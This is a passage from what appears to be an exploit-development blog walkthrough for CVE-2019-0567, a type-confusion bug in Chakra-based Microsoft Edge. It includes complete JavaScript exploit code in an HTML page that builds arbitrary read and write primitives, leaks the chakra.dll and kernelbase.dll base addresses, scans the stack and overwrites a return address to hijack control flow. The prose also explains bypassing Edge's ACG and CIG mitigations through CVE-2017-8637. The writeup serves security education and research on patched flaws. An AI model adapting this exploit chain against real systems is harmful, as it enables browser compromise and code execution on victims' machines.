obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");
}
</script>

After running our exploit, we can see that we have successfully leaked a stack address.

From our experimenting earlier, the offsets between the leaked stack addresses have a certain degree of variance between script runs. Because of this, there is no way for us to compute the base and limit of the stack with our leaked address, as the offset is set to change. Because of this, we will forgo the process of computing the stack limit. Instead, we will perform our stack scanning for return addresses from the address we have currently leaked. Let’s recall a previous image outlining the stack limit of the thread where we leaked a stack address at the time of the leak.

As we can see, we are towards the base of the stack. Since the stack grows “downwards”, as we can see with the stack base being located at a higher address than the actual stack limit, we will do our scanning in “reverse” order, in comparison to part two. For our purposes, we will do stack scanning by starting at our leaked stack address and traversing backwards towards the stack limit (which is the highest, technically “lowest” address the stack can grow towards).

We already outlined in part two of this blog post the methodology I used in terms of leaking a return address to corrupt. As mentioned then, the process is as follows:

  1. Traverse the stack using read primitive
  2. Print out all contents of the stack that are possible to read
  3. Look for anything starting with 0x7fff, meaning an address from a loaded module like chakra.dll
  4. Disassemble the address to see if it is an actual return address

While omitting much of the code from our full exploit, a stack scan would look like this (a scan used just to print out return addresses):

(...)truncated(...)

// Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
// Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

// Print update
document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
document.write("<br>");

// Counter variable
let counter = 0x6000;

// Loop
while (counter != 0)
{
    // Store the contents of the stack
    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

    // Print update
    document.write("[+] Stack address 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));
    document.write("<br>");

    // Decrement the counter
    // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
    counter -= 0x8;
}

As we can see above, we do this in “reverse” order of our ChakraCore exploit in part two. Since we don’t have the luxury of already knowing where the stack limit is, which is the “last” address that can be used by that thread’s stack, we can’t just traverse the stack by incrementing. Instead, since we are leaking an address towards the “base” of the stack, we have to decrement (since the stack grows downwards) towards the stack limit.

In other words, less technically, we have leaked somewhere towards the “bottom” of the stack and we want to walk towards the “top of the stack” in order to scan for return addresses. You’ll notice a few things about the previous code, the first being the arbitrary 0x6000 number. This number was found by trial and error. I started with 0x1000 and ran the loop to see if the exploit crashed. I kept incrementing the number until a crash started to ensue. A crash in this case refers to the fact we are likely reading from decommitted memory, meaning we will cause an access violation. The “gist” of this is to basically see how many bytes you can read without crashing, and those are the return addresses you can choose from. Here is how our output looks.

As we start to scroll down through the output, we can clearly see some return address starting to bubble up!

Since I already mentioned the “trial and error” approach in part two, which consists of overwriting a return address (after confirming it is one) and seeing if you end up controlling the instruction pointer by corrupting it, I won’t show this process here again. Just know, as mentioned, that this is just a matter of trial and error (in terms of my approach). The return address that I found worked best for me was chakra!Js::JavascriptFunction::CallFunction<1>+0x83 (again there is no “special” way to find it. I just started corrupting return address with 0x4141414141414141 and seeing if I caused an access violation with RIP being controlled to by the value 0x4141414141414141, or RSP being pointed to by this value at the time of the access violation).

This value can be seen in the stack leaking contents.

Why did I choose this return address? Again, it was an arduous process taking every stack address and overwriting it until one consistently worked. Additionally, a little less anecdotally, the symbol for this return address is with a function quite literally called CallFunction, which means its likely responsible for executing a function call of interpreted JavaScript. Because of this, we know a function will execute its code and then hand execution back to the caller via the return address. It is likely that this piece of code will be executed (the return address) since it is responsible for calling a function. However, there are many other options that you could choose from.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

Open the updated exploit.html script and attach WinDbg before pressing the Click me to exploit CVE-2019-0567! button.

After attaching to WinDbg and pressing g, go ahead and click the button (may require clicking twice in some instance to detonate the exploit). Please note that sometimes there is a slight edge case where the return address isn’t located on the stack. So if the debugger shows you crashing on the GetValue method, this is likely a case of that. After testing, 10/10 times I found the return address. However, it is possible once in a while to not encounter it. It is very rare.

After running exploit.html in the debugger, we can clearly see that we have overwritten a return address on the stack with 0x4141414141414141 and Edge is attempting to return into it. We have, again, successfully corrupted control-flow and can now redirect execution wherever we want in Edge. We went over all of this, as well, in part two of this blog series!

Now that we have our read/write primitive and control-flow hijacking ported to Edge, we can now begin our Edge-specific exploitation which involves many ROP chains to bypass Edge mitigations like Arbitrary Code Guard.

Arbitrary Code Guard && Code Integrity Guard

We are now at a point where our exploit has the ability to read/write memory, we control the instruction pointer, and we know where the stack is. With these primitives, exploitation should be as follows (in terms of where exploit development currently and traditionally is at):

  1. Bypass ASLR to determine memory layout (done)
  2. Achieve read/write primitive (done)
  3. Locate the stack (done)
  4. Control the instruction pointer (done)
  5. Write a ROP payload to the stack (TBD)
  6. Write shellcode to the stack (or somewhere else in memory) (TBD)
  7. Mark the stack (or regions where shellcode is) as RWX (TBD)
  8. Execute shellcode (TBD)

Steps 5 through 8 are required as a result of DEP. DEP, a mitigation which has been beaten to death, separates code and data segments of memory. The stack, being a data segment of memory (it is only there to hold data), is not executable whenever DEP is enabled. Because of this, we invoke a function like VirtualProtect (via ROP) to mark the region of memory we wrote our shellcode to (which is a data segment that allows data to be written to it) as RWX. I have documented this procedure time and time again. We leak an address (or abuse non-ASLR modules, which is very rare now), we use our primitive to write to the stack (stack-based buffer overflow in the two previous links provided), we mark the stack as RWX via ROP (the shellcode is also on the stack) and we are now allowed to execute our shellcode since its in a RWX region of memory. With that said, let me introduce a new mitigation into the fold - Arbitrary Code Guard (ACG).

ACG is a mitigation which prohibits any dynamically-generated RWX memory. This is manifested in a few ways, pointed out by Matt Miller in his blog post on ACG. As Matt points out:

“With ACG enabled, the Windows kernel prevents a content process from creating and modifying code pages in memory by enforcing the following policy:

  1. Code pages are immutable. Existing code pages cannot be made writable and therefore always have their intended content. This is enforced with additional checks in the memory manager that prevent code pages from becoming writable or otherwise being modified by the process itself. For example, it is no longer possible to use VirtualProtect to make an image code page become PAGE_EXECUTE_READWRITE.

  2. New, unsigned code pages cannot be created. For example, it is no longer possible to use VirtualAlloc to create a new PAGE_EXECUTE_READWRITE code page.”

What this means is that an attacker can write their shellcode to a data portion of memory (like the stack) all they want, gladly. However, the permissions needed (e.g. the memory must be explicitly marked executable by the adversary) can never be achieved with ACG enabled. At a high level, no memory permissions in Edge (specifically content processes, where our exploit lives) can be modified (we can’t write our shellcode to a code page nor can we modify a data page to execute our shellcode).

Now, you may be thinking - “Connor, instead of executing native shellcode in this manner, why don’t you just use WinExec like in your previous exploit from part two of this blog series to spawn cmd.exe or some other application to download some staged DLL and just load it into the process space?” This is a perfectly valid thought - and, thus, has already been addressed by Microsoft.

Edge has another small mitigation known as “no child processes”. This nukes any ability to spawn a child process to go inject some shellcode into another process, or load a DLL. Not only that, even if there was no mitigation for child processes, there is a “sister” mitigation to ACG called Code Integrity Guard (CIG) which also is present in Edge.

CIG essentially says that only Microsoft-signed DLLs can be loaded into the process space. So, even if we could reach out to a retrieve a staged DLL and get it onto the system, it isn’t possible for us to load it into the content process, as the DLL isn’t a signed DLL (inferring the DLL is a malicious one, it wouldn’t be signed).

So, to summarize, in Edge we cannot:

  1. Use VirtualProtect to mark the stack where our shellcode is to RWX in order to execute it
  2. We can’t use VirtualProtect to make a code page (RX memory) to writable in order to write our shellcode to this region of memory (using something like a WriteProcessMemory ROP chain)
  3. We cannot allocate RWX memory within the current process space using VirtualAlloc
  4. We cannot allocate RW memory with VirtualAlloc and then mark it as RX
  5. We cannot allocate RX memory with VirtualAlloc and then mark it as RW

With the advent of all three of these mitigations, previous exploitation strategies are all thrown out of the window. Let’s talk about how this changes our exploit strategy, now knowing we cannot just execute shellcode directly within the content process.

CVE-2017-8637 - Combining Vulnerabilities

As we hinted at, and briefly touched on earlier in this blog post, we know that something has to be done about JIT code with ACG enablement. This is because, by default, JIT code is generated as RWX. If we think about it, JIT’d code first starts out as an “empty” allocation (just like when we allocate some memory with VirtualAlloc). This memory is first marked as RW (it is writable because Chakra needs to actually write the code into it that will be executed into the allocation). We know that since there is no execute permission on this RW allocation, and this allocation has code that needs to be executed, the JIT engine has to change the region of memory to RX after its generated. This means the JIT engine has to generate dynamic code that has its memory permissions changed. Because of this, no JIT code can really be generated in an Edge process with ACG enabled. As pointed out in Matt’s blog post (and briefly mentioned by us) this architectural issue was addresses as follows:

“Modern web browsers achieve great performance by transforming JavaScript and other higher-level languages into native code. As a result, they inherently rely on the ability to generate some amount of unsigned native code in a content process. Enabling JIT compilers to work with ACG enabled is a non-trivial engineering task, but it is an investment that we’ve made for Microsoft Edge in the Windows 10 Creators Update. To support this, we moved the JIT functionality of Chakra into a separate process that runs in its own isolated sandbox. The JIT process is responsible for compiling JavaScript to native code and mapping it into the requesting content process. In this way, the content process itself is never allowed to directly map or modify its own JIT code pages.”

As we have already seen in this blog post, two processes are generated (JIT server and content process) and the JIT server is responsible for taking the JavaScript code from the content process and transforming it into machine code. This machine code is then mapped back into the content process with appropriate permissions (like that of the .text section, RX). The vulnerability (CVE-2017-8637) mentioned in this section of the blog post took advantage of a flaw in this architecture to compromise Edge fully and, thus, bypass ACG. Let’s talk about a bit about the architecture of the JIT server and content process communication channel first (please note that this vulnerability has been patched).

The last thing to note, however, is where Matt says that the JIT process was moved “…into a separate process that runs in its own isolated sandbox”. Notice how Matt did not say that it was moved into an ACG-compliant process (as we know, ACG isn’t compatible with JIT). Although the JIT process may be “sandboxed” it does not have ACG enabled. It does, however, have CIG and “no child processes” enabled. We will be taking advantage of the fact the JIT process doesn’t (and still to this day doesn’t, although the new V8 version of Edge only has ACG support in a special mode) have ACG enabled. With our ACG bypass, we will leverage a vulnerability with the way Chakra-based Edge managed communications (specifically via process a handle stored within the content process) to and from the JIT server. With that said, let’s move on.

Leaking The JIT Server Handle

The content process uses an RPC channel in order to communicate with the JIT server/process. I found this out by opening chakra.dll within IDA and searching for any functions which looked interesting and contained the word “JIT”. I found an interesting function named JITManager::ConnectRpcServer. What stood out to me immediately was a call to the function DuplicateHandle within JITManager::ConnectRpcServer.

If we look at ChakraCore we can see the source (which should be close between Chakra and ChakraCore) for this function. What was very interesting about this function is the fact that the first argument this function accepts is seemingly a “handle to the JIT process”.

Since chakra.dll contains the functionality of the Chakra JavaScript engine and since chakra.dll, as we know, is loaded into the content process - this functionality is accessible through the content process (where our exploit is running). This infers at some point the content process is doing something with what seems to be a handle to the JIT server. However, we know that the value of jitProcessHandle is supplied by the caller (e.g. the function which actually invokes JITManager::ConnectRpcServer). Using IDA, we can look for cross-references to this function to see what function is responsible for calling JITManager::ConnectRpcServer.

Taking a look at the above image, we can see the function ScriptEngine::SetJITConnectionInfo is responsible for calling JITManager::ConnectRpcServer and, thus, also for providing the JIT handle to the function. Let’s look at ScriptEngine::SetJITConnectionInfo to see exactly how this function provides the JIT handle to JITManager::ConnectRpcServer.

We know that the __fastcall calling convention is in use, and that the first argument of JITManager::ConnectRpcServer (as we saw in the ChakraCore code) is where the JIT handle goes. So, if we look at the above image, whatever is in RCX directly prior to the call to JITManager::ConnectRpcServer will be the JIT handle. We can see this value is gathered from a symbol called s_jitManager.

We know that this is the value that is going to be passed to the JITManager::ConnectRpcServer function in the RCX register - meaning that this symbol has to contain the handle to the JIT server. Let’s look again, once more, at JITManager::ConnectRpcServer (this time with some additional annotation).

We already know that RCX = s_jitManager when this function is executed. Looking deeper into the disassembly (almost directly before the DuplicateHandle call) we can see that s_jitManager+0x8 (a.k.a RCX at an offset of 0x8) is loaded into R14. R14 is then used as the lpTargetHandle parameter for the call to DuplicateHandle. Let’s take a look at DuplicateHandle’s prototype (don’t worry if this is confusing, I will provide a summation of the findings very shortly to make sense of this).

If we take a look at the description above, the lpTargetHandle will “…receive the duplicate handle…”. What this means is that DuplicateHandle is used in this case to duplicate a handle to the JIT server, and store the duplicated handle within s_jitManager+0x8 (a.k.a the content process will have a handle to the JIT server) We can base this on two things - the first being that we have anecdotal evidence through the name of the variable we located in ChakraCore, which is jitprocessHandle. Although Chakra isn’t identical to ChakraCore in every regard, Chakra is following the same convention here. Instead, however, of directly supplying the jitprocessHandle - Chakra seems to manage this information through a structure called s_jitManager. The second way we can confirm this is through hard evidence.

If we examine chakra!JITManager::s_jitManager+0x8 (where we have hypothesized the duplicated JIT handle will go) within WinDbg, we can clearly see that this is a handle to a process with PROCESS_DUP_HANDLE access. We can also use Process Hacker to examine the handles to and from MicrosoftEdgeCP.exe. First, run Process Hacker as an administrator. From there, double-click on the MicrosoftEdgeCP.exe content process (the one using the most RAM as we saw, PID 4172 in this case). From there, click on the Handles tab and then sort the handles numerically via the Handle tab by clicking on it until they are in ascending order.

If we then scroll down in this list of handles, we can see our handle of 0x314. Looking at the Name column, we can also see that this is a handle to another MicrosoftEdgeCP.exe process. Since we know there are only two (whenever exploit.html is spawned and no other tabs are open) instances of MicrosoftEdgeCP.exe, the other “content process” (as we saw earlier) must be our JIT server (PID 7392)!

Another way to confirm this is by clicking on the General tab of our content process (PID 4172). From there, we can click on the Details button next to Mitigation policies to confirm that ACG (called “Dynamic code prohibited” here) is enabled for the content process where our exploit is running.

However, if we look at the other content process (which should be our JIT server) we can confirm ACG is not running. Thus, indicating, we know exactly which process is our JIT server and which one is our content process. From now on, no matter how many instances of Edge are running on a given machine, a content process will always have a PROCESS_DUP_HANDLE handle to the JIT server located at chakra::JITManager::s_jitManager+0x8.

So, in summation, we know that s_jitManager+0x8 contains a handle to the JIT server, and it is readable from the content process (where our exploit is running). You may also be asking “why does the content process need to have a PROCESS_DUP_HANDLE handle to the JIT server?” We will come to this shortly.

Turning our attention back to the aforementioned analysis, we know we have a handle to the JIT server. You may be thinking - we could essentially just use our arbitrary read primitive to obtain this handle and then use it to perform some operations on the JIT process, since the JIT process doesn’t have ACG enabled! This may sound very enticing at first. However, let’s take a look at a malicious function like VirtualAllocEx for a second, which can allocate memory within a remote process via a supplied process handle (which we have). VirtualAllocEx documentation states that:

The handle must have the PROCESS_VM_OPERATION access right. For more information, see Process Security and Access Rights.

This “kills” our idea in its tracks - the handle we have only has the permission PROCESS_DUP_HANDLE. We don’t have the access rights to allocate memory in a remote process where perhaps ACG is disabled (like the JIT server). However, due to a vulnerability (CVE-2017-8637), there is actually a way we can abuse the handle stored within s_jitManager+0x8 (which is a handle to the JIT server). To understand this, let’s just take a few moments to understand why we even need a handle to the JIT server, from the content process, in the first place.

Let’s now turn out attention to this this Google Project Zero issue regarding the CVE.

We know that the JIT server (a different process) needs to map JIT’d code into the content process. As the issue explains:

In order to be able to map executable memory in the calling process, JIT process needs to have a handle of the calling process. So how does it get that handle? It is sent by the calling process as part of the ThreadContext structure. In order to send its handle to the JIT process, the calling process first needs to call DuplicateHandle on its (pseudo) handle.

The above is self explanatory. If you want to do process injection (e.g. map code into another process) you need a handle to that process. So, in the case of the JIT server - the JIT server knows it is going to need to inject some code into the content process. In order to do this, the JIT server needs a handle to the content process with permissions such as PROCESS_VM_OPERATION. So, in order for the JIT process to have a handle to the content process, the content process (as mentioned above) shares it with the JIT process. However, this is where things get interesting.

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle. According to Microsoft, a pseudo handle:

… is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.

So, in other words, a pseudo handle is a handle to the current process and it is only valid within context of the process it is generated in. So, for example, if the content process called GetCurrentProcess to obtain a pseudo handle which represents the content process (essentially a handle to itself), this pseudo handle wouldn’t be valid within the JIT process. This is because the pseudo handle only represents a handle to the process which called GetCurrentProcess. If GetCurrentProcess is called in the JIT process, the handle generated is only valid within the JIT process. It is just an “easy” way for a process to specify a handle to the current process. If you supplied this pseudo handle in a call to WriteProcessMemory, for instance, you would tell WriteProcessMemory “hey, any memory you are about to write to is found within the current process”. Additionally, this pseudo handle has PROCESS_ALL_ACCESS permissions.

Now that we know what a pseudo handle is, let’s revisit this sentiment:

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle.

What the content process will do is obtain its pseudo handle by calling GetCurrentProcess (which is only valid within the content process). This handle is then used in a call to DuplicateHandle. In other words, the content process will duplicate its pseudo handle. You may be thinking, however, “Connor you just told me that a pseudo handle can only be used by the process which called GetCurrentProcess. Since the content process called GetCurrentProcess, the pseudo handle will only be valid in the content process. We need a handle to the content process that can be used by another process, like the JIT server. How does duplicating the handle change the fact this pseudo handle can’t be shared outside of the content process, even though we are duplicating the handle?”

The answer is pretty straightforward - if we look in the GetCurrentProcess Remarks section we can see the following text:

A process can create a “real” handle to itself that is valid in the context of other processes, or that can be inherited by other processes, by specifying the pseudo handle as the source handle in a call to the DuplicateHandle function.

So, even though the pseudo handle only represents a handle to the current process and is only valid within the current process, the DuplicateHandle function has the ability to convert this pseudo handle, which is only valid within the current process (in our case, the current process is the content process where the pseudo handle to be duplicated exists) into an actual or real handle which can be leveraged by other processes. This is exactly why the content process will duplicate its pseudo handle - it allows the content process to create an actual handle to itself, with PROCESS_ALL_ACCESS permissions, which can be actively used by other processes (in our case, this duplicated handle can be used by the JIT server to map JIT’d code into the content process).

So, in totality, its possible for the content process to call GetCurrentProcess (which returns a PROCESS_ALL_ACCESS handle to the content process) and then use DuplicateHandle to duplicate this handle for the JIT server to use. However, where things get interesting is the third parameter of DuplicateHandle, which is hTargetProcessHandle. This parameter has the following description:

A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right…

In our case, we know that the “process that is to receive the duplicated handle” is the JIT server. After all, we are trying to send a (duplicated) content process handle to the JIT server. This means that when the content process calls DuplicateHandle in order to duplicate its handle for the JIT server to use, according to this parameter, the JIT server also needs to have a handle to the content process with PROCESS_DUP_HANDLE. If this doesn’t make sense, re-read the description provided of hTargetProcessHandle. This is saying that this parameter requires a handle to the process where the duplicated handle is going to go (specifically a handle with PROCESS_DUP_HANDLE) permissions.

This means, in less words, that if the content process wants to call DuplicateHandle in order to send/share its handle to/with the JIT server so that the JIT server can map JIT’d code into the content process, the content process also needs a PROCESS_DUP_HANDLE to the JIT server.

This is the exact reason why the s_jitManager structure in the content process contains a PROCESS_DUP_HANDLE to the JIT server. Since the content process now has a PROCESS_DUP_HANDLE handle to the JIT server (s_jitManager+0x8), this s_jitManager+0x8 handle can be passed in to the hTargetProcessHandle parameter when the content process duplicates its handle via DuplicateHandle for the JIT server to use. So, to answer our initial question - the reason why this handle exists (why the content process has a handle to the JIT server) is so DuplicateHandle calls succeed where content processes need to send their handle to the JIT server!

As a point of contention, this architecture is no longer used and the issue was fixed according to Ivan:

This issue was fixed by using an undocumented system_handle IDL attribute to transfer the Content Process handle to the JIT Process. This leaves handle passing in the responsibility of the Windows RPC mechanism, so Content Process no longer needs to call DuplicateHandle() or have a handle to the JIT Process.

So, to beat this horse to death, let me concisely reiterate one last time:

  1. JIT process wants to inject JIT’d code into the content process. It needs a handle to the content process to inject this code
